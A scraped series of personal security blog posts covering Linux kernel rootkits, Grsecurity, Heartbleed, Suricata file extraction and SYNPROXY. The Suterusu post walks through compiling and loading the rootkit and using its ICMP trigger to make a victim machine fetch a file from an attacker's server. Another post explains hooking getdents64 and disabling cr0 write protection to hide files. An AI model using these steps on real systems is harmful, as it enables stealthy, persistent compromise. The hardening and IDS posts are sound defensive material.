<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/CWZjQ4BTD0k?feature=player_embedded' frameborder='0'></iframe><br />
<br />
<br />
People are taking serious about ICS security after the disclosure of Stuxnet. In the meantime, snake-oil products/services just come out of nowhere. This talk is awesome. It's almost like ICS security 101 to me. Thanks <span class="st">Eireann, I think I owe you a beer;-)</span><br />
<br /><span style="font-size: large;"><span style="color: #3d85c6;">Reproducible Builds - Moving Beyond Single Points of Failure for Software Distribution</span></span><br /><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/5pAen7beYNc?feature=player_embedded' frameborder='0'></iframe><br />
I love EFF and being proud as a member. EFF has been doing a great job about public education and fighting for individual's privacy. I'm not sure if we could win or not. But this is the right thing to do. Reveal the dark-side of cybersecurity is inevitable. We had to deal with shit like Mr.Dullien mentioned in <a href="http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf" target="_blank">Offensive work and addiction</a>. Do we ever had a chance to live in a *purely* world without "<a href="https://firstlook.org/theintercept/document/2014/03/20/hunt-sys-admins/" target="_blank">I hunt sysadmin</a>"? If we don't, <a href="https://wiki.debian.org/ReproducibleBuilds" target="_blank">reproducible builds</a> is very valuable for us to against mass surveillance. <a href="https://gitian.org/" target="_blank">Gitian</a> is a project, which Seth & Mike mentioned about.<br />
<br />
Reproducible builds can't solve all potential threats. But it can help us in some levels to identify "There is a backdoor in the indentical binary or there isn't a backdoor". You might also want to read about <a href="http://lwn.net/Articles/555902/" target="_blank">Trusting trust issue</a>.<br />
<br />
By the way, another reason I love Debian is because <a href="http://mempo.org/" target="_blank">Mempo</a> project;-) We need your hands..fuck off, NSA!<br /><span style="font-size: large;"><b><br /></b></span><span style="color: #3d85c6;"><a href="http://media.ccc.de/browse/congress/2014/31c3_-_6123_-_en_-_saal_1_-_201412291130_-_freedom_in_your_computer_and_in_the_net_-_richard_stallman.html" target="_blank"><span style="font-size: large;"><b>Freedom in your computer and in the net(click me)</b></span></a></span><br />
<br />
<br />Fascinating free speech from RMS! My wife believes that to be idealistic is to be realistic...are we talking about leap of faith? Sometimes, faith is all we left;-) RMS is one of the most respectful man. His philosophy inspired me to started using GNU/Linux. Phrack inspired me to be a cybersec dude....<br />
<br />
<br />
<br />RMS talked about a few important things in 31C3:<br />
1, The differences between Free software and open source. Free Software is more concern about ethical libre, while open source only emphasize the practical stuff like code quality or cost issue.<br />
<br />
2, Security aspect. Free Software is more secure than closed software. Microsoft send NSA the information of Windows bug before they fix, maybe other vendors( closed-source product) would do the same things.<br />
<br />
3, RMS thinks all university should teach reverse engineering. It's a good choice when you had to explore something in a closed-source world.<br />
<br />
4, RMS siad "<span style="font-size: large;"><span style="color: lime;">...also the software they teach student to use must be free, because the school has social mission to educate good citizens of society that is strong, capable, independent, cooperating and free..</span></span>". Damn..I was touched. I've been asking myself a question for a long time: Why would I support FSF and EFF in the 1st place? Probably I can say now, that is: It's worth. Making the public can get benefit from it and educate the public about free software and digital privacy are so important in the information age.<br />
<br />
btw: Hope I can make it to 31C3.<br />
<br />
May the L0rd's hacking spirit guides us in 2015!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-23394021033196509082014-08-10T19:12:00.001+08:002014-08-10T19:12:25.432+08:00An awesome linux kernel rootkit: Suterusu<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjceRK14AQwcMH_y23aA4ygPVNt_yXEVmVs7phztkVQmrkyAahPTtIXQfpyUoZaKCp820ZT0gUEkWjat1JH9HIKG7GmpDz6ZjfZFGgTBCO1-3_sziemCEAmlfi93sve0S2OfykAjw/s1600/rootkit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjceRK14AQwcMH_y23aA4ygPVNt_yXEVmVs7phztkVQmrkyAahPTtIXQfpyUoZaKCp820ZT0gUEkWjat1JH9HIKG7GmpDz6ZjfZFGgTBCO1-3_sziemCEAmlfi93sve0S2OfykAjw/s1600/rootkit.jpg" height="236" width="320" /></a></div>
<br />
I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, rootkit is one of my TODO things, as always. I wrote a <a href="http://citypw.blogspot.com/2014/02/simple-linux-rootkit-on-debian-with.html" target="_blank">dumb rootkit</a> a half year ago. It's using an old good method to hiding file: hijack some syscalls. There's a better solution called "inline hook". <a href="https://github.com/mncoppola/suterusu" target="_blank">Suterusu</a> is the one implemented a inline hook framework. I don't want to explain the detail of how Suterusu was implemented. Cuz' no one( in the most cases) would do the job better than the original author: Michael Coppola already wrote a good article "<a href="http://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/" target="_blank">Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM</a>".<br />
<br />
I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn...I'd be <span data-dobid="hdw">exhausted if I really do that. There are bunch of rootkits( adore-ng, ddrk, kbeast-v1, wnps, etc) out there and out-of-dated for years. Although you might find some "modern" ones like <a href="http://r00tkit.me/" target="_blank">maK_it</a>, <a href="http://kernel-rootkit-2.6.32/">kernel-rootkit-2.6.32</a>, etc...but..there's always a annoying "but"...these rootkits are either lacking of inline hook framework or can't support a diverse linux kernel versions. I've test Suru on a dozen of different linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine( of course, it's Sur-related;-)):</span><br />
<br />
<span data-dobid="hdw">1, A friend asked for advice about rootkit selection, of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and then it works.</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">2, Another friend( a pentester) asked me if I can make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it was not support 2.6.32 yet. Then I've add less than 100 LOC and then it works.</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out two features of Suru called "ICMP" and "DLEXEC" that I never look into it. A friend( still that pentester) told me it can be used as a covert channel to transfer files. I write a <a href="https://raw.githubusercontent.com/citypw/suterusu/master/test/trigger_icmp_covert.py" target="_blank">triggering program</a> that could craft a specific ICMP header/payload and send it to the "victim server". When the victim receives the packet, it will download a file from a specific server.</span><br />
<br />
<span data-dobid="hdw">---------------------------------------------------------------------</span><br />
<span data-dobid="hdw">1. Download the <a href="https://github.com/citypw/suterusu/" target="_blank">Suterusu</a> for both "victim" and "attacker".</span><br />
<br />
<span data-dobid="hdw">2. The victim is using CentOS 6.5:</span><br />
<span data-dobid="hdw">root@centos-rktesting ~]# <span style="color: lime;">uname -r</span><br />2.6.32-431.el6.x86_64</span><br />
<br />
<span data-dobid="hdw">2.1 Install some necessary packages:</span><br />
<span style="color: lime;"><span style="background-color: white;"><span data-dobid="hdw">yum install -y kernel-devel.x86_64 gcc vim</span></span></span><br />
<br />
<span data-dobid="hdw">2.2 Compile & load the rootkit:</span><br />
<span data-dobid="hdw">[root@centos-rktesting suterusu]# <span style="color: lime;">make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y</span><br />make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules<br />make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'<br /> CC [M] /root/suterusu/main.o<br /> CC [M] /root/suterusu/util.o<br /> CC [M] /root/suterusu/module.o<br /> CC [M] /root/suterusu/dlexec.o<br /> CC [M] /root/suterusu/icmp.o<br /> LD [M] /root/suterusu/suterusu.o<br /> Building modules, stage 2.<br /> MODPOST 1 modules<br /> CC /root/suterusu/suterusu.mod.o<br /> LD [M] /root/suterusu/suterusu.ko.unsigned<br /> NO SIGN [M] /root/suterusu/suterusu.ko<br />make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'</span><br />
<span data-dobid="hdw">[root@centos-rktesting suterusu]# <span style="color: lime;">insmod suterusu.ko</span><br /> </span><br />
<span data-dobid="hdw">3. The attacker can use anything GNU/Linux distro as you want, compile the file server and designate the file you want it to be transferred:</span><br />
<span data-dobid="hdw">shawn@shawn-fortress /tmp/suterusu $ <span style="color: lime;">sudo ./a.out 8556 README.md </span><br />Bound to port 8556, waiting for connection...</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">3.1 Open a new terminal:</span><br />
<span data-dobid="hdw">shawn@shawn-fortress /tmp/suterusu $ <span style="color: lime;">cd test/</span><br />shawn@shawn-fortress /tmp/suterusu/test $ <span style="background-color: black;"><span style="color: lime;">ls</span></span><br />trigger_icmp_covert.py<br />shawn@shawn-fortress /tmp/suterusu/test $ <span style="color: lime;">./trigger_icmp_covert.py</span></span><br />
<br />
<span data-dobid="hdw"> 4. Go to the victim's machine, check:</span><br />
<span data-dobid="hdw">[root@centos-rktesting ~]# <span style="color: lime;">cat /root/.tmp</span></span><br />
<span data-dobid="hdw">Suterusu<br />========<br /><br />Typical compilation steps:</span><br />
<span data-dobid="hdw">...........................................................</span><br />
<span data-dobid="hdw">.................................................................</span><br />
<br />
<span data-dobid="hdw">---------------------------------------------------------------------</span><br />
<br />
<span data-dobid="hdw">That's it! Show time is over! It's quite simple, ah? I really appreciate Michael Coppola released Suterusu under <a href="https://raw.githubusercontent.com/mncoppola/suterusu/master/LICENSE" target="_blank">free/open source software license</a>. And I also thank him brings us good writings;-)</span><br />
<br />
<span data-dobid="hdw">btw: What next? I probably go to try some memory forensics, to see if I could hunt some rootkits;-) </span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Have fun & good hunting!!!</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">May the L0rd's hacking spirit guide us!!!</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Further readings:</span><br />
<span data-dobid="hdw">[1] RFC-792</span><br />
<span data-dobid="hdw">http://tools.ietf.org/html/rfc792</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[2] Python documentation:</span><br />
<span data-dobid="hdw">https://docs.python.org/2/library/struct.html</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[3] TCP/IP protocols</span><br />
<span data-dobid="hdw">http://www.protocols.com/pbook/tcpip3.htm</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[4] Sock-RAW</span><br />
<span data-dobid="hdw">http://sock-raw.org/papers/sock_raw</span>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com3tag:blogger.com,1999:blog-35345954.post-47054831290124176482014-05-14T19:12:00.001+08:002014-05-14T19:12:34.802+08:00Simple Grsecurity RBAC policy with kernel 3.14.1 on Debian 7.4Speaking of kernel hardening, I personally like Apparmor and sick of SELinux( you know why). <a href="http://www.phrack.org/archives/issues/67/13.txt" target="_blank">pi3's paper on Phrack Issue 67</a> was the 1st place I've met Grsecurity/Pax. I never forget that 30-sec would help the people to build the defense in depth;-) Then I went to read some Phrack papers from old good hacking days that I missed. Then I know they are the original authors of ASLR...and much more. No doubt that Grsecurity/Pax is one of the most respected old school communities......Note: Grsecurity/Pax don't use LSM since LSM breaks the principle of build-security-in, which should treat the security as whole. I think it's time to explore....<br />
<br />
Download <span style="color: lime;">kernel</span>:<br />
https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.14.1.tar.xz<br /><br />Download <span style="color: blue;">grsecurity</span> patch:<br />https://www.grsecurity.net/test/grsecurity-3.0-3.14.3-201405121814.patch<br />
<br />
Patch the kernel with grsecurity:<br />
xz -d linux-3.14.1.tar.xz<br />tar xvf linux-3.14.1.tar<br />cd linux-3.14.1/<br />patch -p1 < ../grsecurity-3.0-3.14.3-201405121814.patch<br /><br />You can use my kernel <span style="color: cyan;">config</span>:<br />https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/debian-7.4-linux-3.14.1-grsec.config<br /><br />Or make your own config via "<span style="color: lime;">make menuconfig</span>". Then compile the kernel:<br />make -j3 deb-pkg<br /><br />It will help you build deb packages. All you need to do is install them:<br />dpkg -i ../*.deb<br /><br />Now, the kernel part is done. Download <span style="color: lime;">gradm</span>( RBAC administrator utility):<br />https://www.grsecurity.net/stable/gradm-3.0-201401291757.tar.gz<br /><br />tar zxvf gradm-3.0-201401291757.tar.gz<br />cd gradm/<br />make && make install<br /><br />Reboot the machine:<br />shutdown -r now<br /><br />Now, you need to set a bunch of <span style="color: red;">annoying</span> passwords:<br />root@d6-test:/etc/grsec# gradm -P<br />Setting up grsecurity RBAC password<br />Password: <br />Re-enter Password: <br />Password written to /etc/grsec/pw.<br />root@d6-test:/etc/grsec# <br />root@d6-test:/etc/grsec# gradm -P admin<br />Setting up password for role admin<br />Password: <br />Re-enter Password: <br />Password written to /etc/grsec/pw.<br />root@d6-test:/etc/grsec# <br />root@d6-test:/etc/grsec# gradm -P shutdown<br />Setting up password for role shutdown<br />Password: <br />Re-enter Password: <br />Password written to /etc/grsec/pw.<br /><br />Add this:<br />https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/grsec_conf.a.out<br /><br />into the tail of /etc/grsec/policy<br /><br />What I did in the above policy was I created role shawn as a user, with some default polices, like /bin is executable only, etc. Then I set a binary /home/shawn/grsec_test/a.out has read permission on /home/shawn/hello and write permission on /home/shawn/world and run another shell is not allowed. You can use my code to test the policy:<br />
<br />
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/apparmor_test.c<br />
<br />
btw: I tested the <a href="http://pastebin.com/yTSFUBgZ" target="_blank">poc of CVE-2014-0196</a> on kernel-3.13 and it crashed the kernel. I tested it on kernel-3.14.1 with Grsecurity and it doesn't work. But this issue should be affected on 3.14.1...ah, I think Grsecurity works in some "mysterious" ways to prevent this poc. I'll dig deeper about this amazing hardening implementation.<br />
<br />Further readings:<br />
[1] Grsecurity wiki<br />
http://en.wikibooks.org/wiki/Grsecurity<br />
<br />
[2] Documentation for the PaX project<br />
https://pax.grsecurity.net/docs/<br />
<br />
[3] Grsecurity Blog<br />
https://forums.grsecurity.net/viewforum.php?f=7Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-50676692037762652592014-04-16T18:07:00.001+08:002014-04-16T18:07:31.638+08:00Audit: don't only focus on heartbleed issueI received the info about heartbleed issue on Apr 8 andI found out SLES-11 are using OpenSSL 0.9.8 branch code, which is not vulnerable to heartbleed issue. Then I patched it for OpenSuSE 13.1/12.3. It was easy because the patch was already there.<br />
<br />
After an exciting and crazy week. People are getting calm and plan or already start to doing audit on their system. But there are something you might miss. The older version of OpenSSL( like 0.9.8) might not affected by
heartbleed issue but it doesn't mean you are secure. Don't forget the
old OpenSSL are still vulnerable to BEAST( 2011), CRIME( 2012),<a href="http://www.isg.rhul.ac.uk/tls/" target="_blank"> Lucky-thirteen</a>( 2013). I do believe Lucky-thirteen is far more dangerous
than heartbleed, we just don't know. Once you start the audit, plz
upgrade the OpenSSL to the latest version. If you are using 0.9.8, plz upgrade
to 0.9.8y, which is not vulnerable to Lucky-13 issue.<br />
<br />
Fix heartbleed issue for website is much easier than the networking devices( Firewall, UTM, SSL/IPSEC VPN, etc) and the 3rd-party software. This definitely gonna impacting for long term.<br />
<br />
I'd like to share some materials( you might already known).<br />
<br />
Heartbleed issue technical analysis:<br />
https://www.getpantheon.com/heartbleed-fix<br />
http://blog.ioactive.com/2014/04/bleeding-hearts.html<br />
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html<br />
http://blog.ioactive.com/2014/04/bleeding-hearts.html<br />
<br />
<br />
I totally agree with the last point from this article:<br />
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html<br />
<br />
To these major companies are
highly reply on the open source TLS implementation( OpenSSL, GnuTLS,
etc) should give them funding, to make them more secure and stable.<br />
<br />
EFF is always right about how to aginst massive surveillance by agencies<br />
like NSA. PFS is so fuc*ing important especially today. I think we should use TLS 1.2.<br />
<br />
https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013<br />
https://www.eff.org/deeplinks/2014/04/why-web-needs-perfect-forward-secrecy<br />
https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection<br />
https://www.eff.org/deeplinks/2011/11/long-term-privacy-forward-secrecy<br />
<br />
Performance hit probably is one of reasons that PFS is so important but the fact is only afew websites using it:<br />
http://nmav.gnutls.org/2011/12/price-to-pay-for-perfect-forward.html<br />
<br />
Test top-1m websites:<br />
https://github.com/musalbas/heartbleed-masstest<br />
<br />
C:<br />
https://github.com/robertdavidgraham/heartleech<br />
<br />
Client PoC:<br />
https://github.com/Lekensteyn/pacemaker<br />
<br />
---------------------------------------------------------<br />
One more thing, to those who are still complaining about the security of free/open source software is worse than closed software. Well, I don't want to argue here. But, I'm giving you type of people 3 options:<br />
1, Join the community, help the FOSS community to do code audit.<br />
2, Make some donations to the organizations who really cares about your privacy and do the code audit for us. Like EFF, I'm fuc*ing pround of I'm member of EFF.....<br />
3, G O H O M E A N D F U C K Y O U R S E L F ! ! !Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-81287556043986792332014-03-31T18:30:00.001+08:002014-03-31T18:31:49.566+08:00Suricata's file extraction on Debian GNU/Linux<a href="http://suricata-ids.org/" target="_blank">Suricata</a> is a high performance open source IDS/IPS project. I used it a long time ago around 2010 when it was released. I've been playing with Snort recently and then found Suricata has a great feature: <a href="https://redmine.openinfosecfoundation.org/projects/suricata/wiki/File_Extraction" target="_blank">File extraction</a>. It'd be helpful to those who want to get malware samples from IDS. Anyway, like old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.<br />
<br />
Download a latest version of the <a href="http://www.debian.org/distrib/netinst.en.html" target="_blank">small installation ISO image</a>. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs are <span style="color: red;">eth0</span> and <span style="color: red;">eth1</span>. Interface eth0 is running on NAT mode and eth1 is running bridge mode. Debian don't assign any IP addr to eth1.<br />
<br />
Because our <span style="color: #38761d;">Debian</span> is the small installation. So we have to install some dependency packages via simply apt-get:<br />
<br />
#<span style="color: blue;">apt-get</span> install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential<br />
<br />
Get the source code of <span style="color: blue;">Suricata</span>:<br />
#cd /tmp<br />
#wget wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz<br />
#tar zxvf suricata-2.0.tar.gz<br />
#cd suricata-2.0<br />
<br />
Compile and installation:<br />
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var<br />
#make -j3<br />
#make make-full<br />
<br />
Edit suricata.yaml:<br />
1, Set the request/response body a litte bigger:<br />
request-body-limit: 1gb #3072<br />
response-body-limit: 1gb #3072<br />
<br />
2, Enable file extraction:<br />
- file-store:<br />
enabled: yes # set to yes to enable<br />
log-dir: files # directory to store the files<br />
force-magic: no # force logging magic on all stored files<br />
force-md5: no # force logging of md5 checksums<br />
waldo: file.waldo # waldo file to store the file_id across runs<br />
<br />
# output module to log files tracked in a easily parsable json format<br />
- file-log:<br />
enabled: yes<br />
filename: files-json.log<br />
append: yes<br />
#filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'<br />
<br />
3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:<br />
default-rule-path: /usr/local/suricata/etc/suricata/rules<br />
rule-files:<br />
- test.rules<br />
- botcc.rules<br />
<br />
Create a rule file:<br />
/usr/local/suricata/etc/suricata/rules/test.rules<br />
<br />
Add one line into test.rules( to save any jpg files) :<br />
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)<br />
<br />
Enable the eth1:<br />
#ifconfig eth1 up<br />
<br />
According to the Suricata's wiki, we should turn off the TCP GSO:<br />
ethtool -K eth1 tso off<br />
ethtool -K eth1 gro off<br />
ethtool -K eth1 lro off<br />
ethtool -K eth1 gso off<br />
ethtool -K eth1 rx off<br />
ethtool -K eth1 tx off<br />
ethtool -K eth1 sg off<br />
ethtool -K eth1 rxvlan off<br />
ethtool -K eth1 txvlan off<br />
ethtool -N eth1 rx-flow-hash udp4 sdfn<br />
ethtool -N eth1 rx-flow-hash udp6 sdfn<br />
ethtool -n eth1 rx-flow-hash udp6<br />
ethtool -n eth1 rx-flow-hash udp4<br />
ethtool -C eth1 rx-usecs 1000<br />
ethtool -C eth1 adaptive-rx off<br />
<br />
Run the Suricata with this command:<br />
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata//suricata.yaml -i eth1<br />
<br />
Use your firefox/chrome on your host machine, and visit some website, like <a href="http://image.baidu.com/i?ct=503316480&tn=baiduimagedetail&statnum=girl&ipn=d&cg=girl&word=%E7%BE%8E%E5%A5%B3%20%E4%B8%8D%E5%90%8C%E9%A3%8E%E6%A0%BC%20%E6%80%A7%E6%84%9F%20&ie=utf-8&in=3354&cl=2&lm=-1&st=&pn=6&rn=1&di=&ln=1998&&fmq=1378374347070_R&ic=&s=&se=&sme=0&tab=&face=&&is=0,1505379&istype=&ist=&jit=&objurl=http%3A%2F%2Fimage.tianjimedia.com%2FuploadImages%2F2011%2F360%2F6955G4EI49W6.jpg#pn6&0&di&objURLhttp%3A%2F%2Fimage.tianjimedia.com%2FuploadImages%2F2011%2F360%2F6955G4EI49W6.jpg&fromURLhttp%3A%2F%2Fpic.yesky.com%2F77%2F30963577_3.shtml&W850&H566&T&S&TP0" target="_blank">this</a>.<br />
<br />
You should see some girl pictures in /var/log/suricata/files ;-)<br />
<br />
btw: Thanks to Suricata community brings us this fuc*ing awesome IDS/IPS project. Special thanks to <span class="gI"><span class="gD" name="Peter Manev">Peter Manev.</span></span>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-74548862617523529162014-03-19T22:13:00.000+08:002014-03-19T22:13:22.872+08:00SYNPROXY: the great DoS mitigation solutionI don't expect to can see a perfect DoS solution in my lifetime;-) As we known, there are tons of commercial gateway-level boxes can mitigate the DoS attack in some ways. But I prefer the combination of x86+GNU/Linux, like the most old school guys. Why? My answer is simple: It's the fuc*ing cheapest solution we have. <a href="http://lwn.net/Articles/563151/" target="_blank">SYNPROXY</a> is one of new features of linux kernel 3.13. It's based on netfilter framework and connection tracking. If I understand correctly, SYPROXY should mark the initial SYN packet as UNTRACKED and redirecting them into iptables's action "SYNPROXY"( like ACCEPT, DROP, NF_QUEUE, etc). SYNPROXY would be acting like a network gateway device( router?) to performing the regular TCP x-way handshakes. The original packet will be passing into the dst when handshake process is finished. The contributor Jesper Dangaard Brouer gave us a free speech at DEVCON last month. According to <a href="http://people.netfilter.org/hawk/presentations/devconf2014/iptables-ddos-mitigation_JesperBrouer.pdf" target="_blank">his slide</a>'s test result, these numbers are really looking good. I did a little test with my colleague today.<br />
<br />
Platform: Debian, SLES-12-beta2<br />
Hardware: Laptop, Server, 100Mbps Switch<br />
Tools: hping3, metasploit<br />
<br />
root@d6-test:/home/shawn# iptables -t raw -A PREROUTING -i eth0 -p tcp --dport 8888 --syn -j NOTRACK<br />
root@d6-test:/home/shawn# iptables -A INPUT -i eth0 -p tcp --dport 8888 -m state --state UNTRACKED,INVALID -j SYNPROXY --sack-perm --timestamp --mss 1480 --wscale 7 --ecn<br />
echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose<br />
<br />
Result:<br />
Without SYNPROXY: ksoftirq is around 8%-9%<br />
With SYNPROXY: ksoftirq is less than 3%<br />
<br />
btw: This result may not be very accurate. Anyway, SYNPROXY works.Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-50639666561243093232014-02-06T18:13:00.000+08:002014-02-06T18:13:30.048+08:00Simple linux rootkit on Debian with kernel 3.13I've wasted a lot of time in 2013. I've always find some shity execuses, like "I'm fucking busy recently" to delay my hacking journey of kernel rootkit. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during Chinese new year vacation at my hometown. I begun the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the old good hacking days. It's old but it'd help.<br /><br />---------------------------------------------------------------<br />[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52<br />January 26, 1998, article 18 of 20]<br />http://www.phrack.org/issues.html?issue=52&id=18&mode=txt<br /><br />[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of<br />0x0e]<br />http://www.phrack.org/issues.html?issue=58&id=6&mode=txt<br /><br />[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,<br />Issue 59, Phile #0x04 of 0x12]<br />http://www.phrack.org/issues.html?issue=59&id=4&mode=txt<br /><br />[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of<br />0x0f]<br />http://www.phrack.org/issues.html?issue=61&id=14&mode=txt<br /><br />[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of<br />0x0f]<br />http://www.phrack.org/issues.html?issue=65&id=8&mode=txt<br /><br />Especially thanks to THC's paper, which was released in 1999:<br />[Complete Linux Loadable Kernel Modules]<br />https://www.thc.org/papers/LKM_HACKING.html<br />---------------------------------------------------------------<br /><br />I wrote a simple rootkit that can only hide a specific file. Just a<br />few old school steps could make its feature possible:<br /><br />Firstly, we need to retrieve the system call table. But it's no longer<br />exported since 2.6. Fortunately, there's still a few system calls are<br />exported. sys_close() is one of them:<br />--------------------------------------<br />root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0<br />c10e0aa1 T sys_close<br />c140fdc4 R __ksymtab_sys_close<br />c141815c r __kcrctab_sys_close<br />c1420e33 r __kstrtab_sys_close<br />--------------------------------------<br /><br />I used a brute force way to locate that system call. I learned it from<br />memset's blog:<br />https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/<br /><br />Start mem addr would be 0xc0000000, then it would try it repeatly unti<br />it locate sys_close()'s addr.<br /><br />Then, write protection bit in cr0 has to be shut down. WP bit is the<br />16th bit in cr0 register.<br /><br />31 30 29 28 19 18 17 16 15 6 5 4 3 2 1 0<br />+----------------------------------------------------------------------+<br />|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|<br />+----------------------------------------------------------------------+<br /><br />After we done above steps, we are able to hijack the system call we<br />want. Here I choose to hijack getdents64(). Why? Because all I wanna<br />do is hide a specific file from "ls". Let's see what "ls" would<br />usually do:<br />------------------------------------------<br />// begin.........<br />execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0<br />brk(0) = 0x8366000<br />access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)<br />mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000<br />access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)<br />open("/etc/ld.so.cache", O_RDONLY) = 3<br />fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0<br />.......................<br />.......................<br />.......................<br />// look, that's it<br />getdents64(3, /* 17 entries */, 32768) = 544<br />getdents64(3, /* 0 entries */, 32768) = 0<br />close(3) = 0<br />fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0<br />mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000<br />.......................<br />// then it would display them in the standard out(1)<br />write(1, "a.out dirent.c dirent.c~ insi"..., 107a.out dirent.c dirent.c~ insight-lab libmnl libnftables linux-3.13 linux-3.13.tar my_tmp nftables<br />) = 107<br />.......................<br />------------------------------------------<br /><br />The only struct from kernel we have to face is: <br />-------------------------------------------------------------------<br /> struct linux_dirent {<br /> unsigned long d_ino; /* Inode number */<br /> unsigned long d_off; /* Offset to next linux_dirent */<br /> unsigned short d_reclen; /* Length of this linux_dirent */<br /> char d_name[]; /* Filename (null-terminated) */<br /> /* length is actually (d_reclen - 2 -<br /> offsetof(struct linux_dirent, d_name) */<br /> /*<br /> char pad; // Zero padding byte<br /> char d_type; // File type (only since Linux 2.6.4;<br /> // offset is (d_reclen - 1))<br /> */<br /><br /> }<br />-------------------------------------------------------------------<br /><br />d_reclen is size of the current linux_dirent64, it does matters. Plz<br />read the<a href="https://github.com/citypw/citypw-SCFE/blob/master/security/rootkit/hide_file/hide_file.c" target="_blank"> fucking source code</a> for any detail! Well, like in good old days, I drew an ascii <a href="https://raw.github.com/citypw/citypw-SCFE/master/security/rootkit/hide_file/README" target="_blank">big picture</a> here.<br />
<br />
